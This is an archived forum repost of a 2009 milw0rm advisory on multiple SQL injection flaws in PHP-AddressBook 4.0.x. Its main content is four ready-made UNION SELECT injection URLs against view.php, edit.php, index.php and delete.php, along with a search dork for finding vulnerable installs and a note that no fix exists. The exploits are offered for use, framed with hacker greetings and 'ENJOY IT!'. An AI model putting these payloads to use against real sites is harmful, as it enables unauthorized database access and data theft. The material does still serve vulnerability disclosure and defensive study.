PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

cmest 2009-7-2 10:26

PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities

原始出处：milw0rm.com
***********************************************************************************************
***********************************************************************************************
**                  **
**          **
**    [] [] []  [][][][>  []    []  [][  ][]    [] [][]]  []  [>  [][][][>  [][][][] **
**    || || ||  []       [][] [] []  []    [] []    [] [] []    [] [] **
** [>  [][][][]  [][][][>  [] []  [] []  [] [][]  []    [][] [][][][>  [] [] **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> []    []       [] [][] []  [] [][][]  []    [][] []          [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][>  [][] [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][] [] **
**                                        **
**       **
**                         VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                   **
**    PROUD TO BE SPANISH!       **
**       **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|          MULTIPLE SQL INJECTION VULNERABILITIES                      |
|--------------------------------------------------------------------------------------------|
|                            | PHP-AddressBook v-4.0.X    |                         |
|  CMS INFORMATION:          ----------------------------------                      |
|                |
|-->WEB: http://sourceforge.net/projects/php-addressbook/                         |
|-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/                      |
|-->DEMO: http://php-addressbook.sourceforge.net/demo/                      |
|-->CATEGORY: Address Book                                                                |
|-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer.       |
| Manage groups, addresses, e-Mails, phone numbers & birthdays...       |
|-->RELEASED: 2009-06-13       |
|       |
|  CMS VULNERABILITY:       |
|       |
|-->TESTED ON: firefox 3       |
|-->DORK: "php-addressbook"                         |
|-->CATEGORY: SQL INJECTION                                     |
|-->AFFECT VERSION:  4.0.X                     |
|-->Discovered Bug date: 2009-06-16       |
|-->Reported Bug date: 2009-06-16       |
|-->Fixed bug date: N/A       |
|-->Info patch (????): N/A             |
|-->Author: YEnH4ckEr       |
|-->mail: y3nh4ck3r[at]gmail[dot]com       |
|-->WEB/BLOG: N/A       |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.    |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)       |
----------------------------------------------------------------------------------------------

Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest).

#####################
////////////////////

SQL INJECTION VULN:

////////////////////
#####################

-----------
EXPLOITS:
-----------

<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>

[++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23

[++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23

[++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23

<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>

[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23

-------------
WATCH VIDEO:
-------------

SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo

<<<-----------------------------EOF---------------------------------->>>ENJOY IT!

##############################################################################
##############################################################################
##**************************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!       ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities